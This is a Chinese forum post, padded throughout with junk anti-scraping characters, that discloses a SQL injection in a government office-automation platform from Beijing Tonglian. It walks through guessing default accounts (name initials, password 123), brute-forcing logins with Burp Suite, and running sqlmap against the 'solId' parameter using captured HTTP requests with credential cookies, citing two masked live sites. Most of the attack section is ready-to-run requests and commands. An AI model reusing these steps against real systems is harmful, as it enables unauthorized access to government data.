|
& F# Y4 t Y5 f8 y
, |9 V) I2 T9 _
1 l. e+ K$ W y" _* C6 ?
( B+ X4 j, Y- V
平台简介:
1 J2 x4 D. c8 w2 R7 \
! \8 M$ ?4 J H; l; K- S i1 h/ J* [0 a9 y* [( Z# n u
/ [$ E# ^; L0 ^: P2 R
! P' X" T4 s- A. h& Y. F* A7 ~! P# }! f' G0 \3 g2 p4 ?) @; `
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
, Q7 F6 V- H2 _4 X# d$ C+ u
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 L' {* R3 x3 a! ?- v9 x同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
0 s" @6 Z3 _2 @
7 s( g0 `7 u% [3 l9 T- q) q9 r/ V- @9 T, p3 @4 f1 {
/ [* \3 k9 k3 m9 p0 |; N8 C
+ h2 g. [* ^% T; ^% q0 O0 k
' a: \2 Q' a8 g4 D t7 E. h; O7 d/ b- c 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:) U: J ^6 b! K- c) F
3 F9 Y6 D& [, P$ Z" T$ v
4 j" w1 M; H0 v3 q9 x . z, `" u \( v, \2 g$ s) M
+ h% Y% M( X9 ^
2 j3 I3 D& E/ J' E7 v http://1.1.1.1:7197/cap-aco/#(案例2-)7 E+ L# ^0 b# S# |
4 I, S9 `6 T$ B1 A6 T
( Y4 A, }4 K6 @4 d; ~" ] http://www.XXOO.com (案例1-官网网站)
5 P: K0 I& _. y% S C U( [ 4 e" b9 k5 u, [
8 C6 z& ]8 X5 c0 V2 w5 u
8 J; h7 d) N. r' T! O& K 8 D$ ?# Z, r0 y, V: B( R; b' H
+ S2 r, {0 z/ p+ n
漏洞详情:
( L! b4 u2 z+ z6 u, m0 M
$ `2 `& ^( \3 P' k9 Z: M" C
6 x* ?6 N6 M! ^# k3 \! Z; \- d* A 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试6 K$ f/ _2 X" |, B. l
- s5 G( k- R' r. e$ u
$ w" W8 G4 C' B5 ]+ b( L, }& ]
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:8 E: \7 n# k3 S
4 E) ^& I. z7 I( v
5 E0 k" R5 P+ ^$ |, w. }
- I( e6 _6 N# ]' c9 l
7 q( q9 h5 u" E! h
# ^5 L4 g, L+ U+ M9 t5 U+ V  8 G6 @5 O% S4 I
' \: Y- o" C" U2 d
" G+ L; W/ z% C! P, o status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
$ R3 s+ j/ y$ q( k- l4 H- T8 I- E- l
* i- m. X: K3 A7 f6 l8 v, S
0 N$ c9 _1 @4 t( ~ 1、案例1-官方网站
4 b P9 z0 z1 k2 @1 F $ i1 K. s) u( e, n3 J! V
+ g I1 A7 o) w9 ? GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
: Q/ P) [+ }: w4 x% ]
3 m6 n9 o+ D- r$ ]5 _& z) V7 J4 r. s1 b2 x+ {
Host: www.XXOO.com- P! P1 @" j; X6 \/ J& Q8 h8 R
$ [4 c+ X2 f- w7 Z! M4 B0 w
! ^+ ?+ n$ ~, A5 H7 A' q Proxy-Connection: Keep-Alive2 t; Z }" H8 y, @3 p6 Q
5 j6 x/ r( X5 Z5 i# p9 ]2 h; K7 C
, V2 i2 v1 C* k; x
Accept: application/json, text/javascript, */*; q=0.01" D; }/ X. W6 P& D- E6 {
Z2 {3 g* C' n/ w2 s
+ ]! ~# J9 e0 z9 X Accept-Language: zh-CN
/ ]( D* B6 C% }& J1 {" C% ? : E! X3 s4 q; R; D7 h
9 B& X' S0 n5 [# p' R Content-Type: application/json/ b% K- Q8 t, r' d5 M4 @. t3 \
+ C' ~; ]! K/ r" z; L& }) G5 d" |! q* |0 ^. W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
& G( a' N* Z1 s j' y $ _* i! b# I4 O/ h% q
! E# s# o7 ?9 y: L% a" }% r
X-Requested-With: XMLHttpRequest
7 H$ K$ X3 e" i' ?$ ?, O
, s1 O F7 u% |( l- o m* e4 C! Q4 J) e0 u1 @$ C$ [
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002) R9 D8 ^/ p5 D+ [
' m ]& {4 _7 H+ k% i+ v
* N" T- n$ m4 a i: e
Accept-Encoding: gzip, deflate, sdch- y# J/ E, W& X) @3 x7 K+ D
, c. K& Q5 Q* K. G4 A* o) E5 J/ r' z1 R% Q9 @7 d5 u
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e1 c& M; R& |( A1 o9 F- }0 D1 `
" _4 d: ` K5 |3 h2 B0 e
/ z) v. }. A( p, u- Q: m6 c# V | h
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
2 e6 r: x! U% d: s( P . T J2 N: f+ p) o9 S/ C
* ~2 `0 d7 g; i9 t+ m. y0 R
) D' N/ |# v3 X9 v$ ? e % g( _4 z# Q" i( ]$ o3 K# w, U: ]
5 u% ?" I( A# c; m3 [
$ C; W G3 q* _% E% ^4 O# ~7 n2 W ( N5 t8 K E6 y1 A
$ V+ n! Y% o0 r- S% T- Z
; S; s: k {- N
6 b7 C, |( C. `$ x }
% c& z U/ ]* _ f0 g, U0 O* U' f & C+ p9 x& g L/ M" p8 r
; S( }! {! D- N2 B' \' ~
8 R$ k1 {( J% Q+ i p" L
7 d( U2 x( Y, }/ A! _& Q3 O0 e
2 Z: ]5 o% ]6 m# d' d7 b }# F, U
2、案例2-某天河云平台
+ Y- C5 j+ V0 b4 q" N, T, r7 N / X! Q4 p5 R; X" S$ i+ r+ u
# [ A3 b* F: |9 l( k GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1' ^- _: m/ Q% k7 c+ Z7 V' S
. S+ C+ ]8 v. p9 B: H$ @
1 g' T0 w6 ?) W+ l% m1 J. N4 W Host: 1.1.1.:7197
' Z/ z/ i# @) Z8 e; b; l4 `1 Y6 R
- R( ^, m0 }% E5 J
0 e4 Z! S9 z* b4 G7 U/ }0 p. `6 G Accept: application/json, text/javascript, */*; q=0.019 X' h7 x( z: x
- }* b2 O& P* I( T& T/ D
- [1 s1 h/ @: Q. N
X-Requested-With: XMLHttpRequest. P, M0 I; g* Z' g! j/ e
7 Y8 R: z+ l) K
5 C+ d3 f! `5 [! s User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0$ Q" [, P0 K5 h; G# L4 f8 O
2 N. v: E$ O( ^( f9 J
% J) `8 v c& L) q7 [ Content-Type: application/json" |4 I. f) {8 R( A
& g- x5 j+ g( d( c f
/ t' V p, s% ]' x Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008- a( e' U0 L% @4 {! i% I$ b
7 g* h" r2 E9 e, X( I+ K( Y# c& _! `) [0 |$ `- H* I. m8 S* O
Accept-Language: zh-CN,zh;q=0.8
& y8 S2 K3 n' {% v / U* q' t& {+ Q% e" A* n
+ Y% S& |) ?. b1 p9 U6 \ Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
, [3 R1 w6 U$ W+ M5 e2 }
7 _( {! {. i0 S% T/ v/ C7 Y. Y. D# s- M1 I, @: h
Connection: close7 r1 g# Q# d6 @: E
4 \& n, v9 H- ?. b, a& K+ ^0 r1 ?
$ Z* ^& p8 O6 O3 o1 S! C6 s 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* Z* U( l' d9 R
% D, c! V0 h" M3 u& S
* n+ b# t0 ^$ c: I# ~7 F, \/ x* q  # y. v8 Q1 i: r( R& E, v
" h$ A( |! C1 v! L+ g0 a; `5 i' a5 m/ D7 Z: J
+ Z% r3 m- B1 a6 ^; W8 }6 ?6 `, K
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对